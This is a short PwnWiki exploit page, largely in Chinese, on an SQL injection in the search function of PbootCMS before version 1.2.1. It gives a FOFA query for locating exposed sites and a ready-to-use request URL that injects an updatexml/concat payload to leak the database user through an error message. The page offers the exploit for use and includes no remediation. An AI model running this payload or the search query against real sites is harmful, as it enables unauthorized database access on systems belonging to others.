PbootCMS search SQL注入漏洞

From PwnWiki
Revision as of 14:37, 8 July 2021 by Pwnwiki (talk | contribs) (Marked this version for translation)
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Other languages:
Chinese

漏洞影響

PbootCMS < 1.2.1


FOFA

app="PBOOTCMS"

漏洞利用

/index.php/Search/index?keyword=123&updatexml(1,concat(0x7e,user(),0x7e),1));%23=123](http://127.0.0.1/PbootCMS/index.php/Search/index?keyword=123&updatexml(1,concat(0x7e,user(),0x7e),1));%23=123)
Retrieved from "https://pwnwiki.com/index.php?title=PbootCMS_search_SQL注入漏洞&oldid=6505"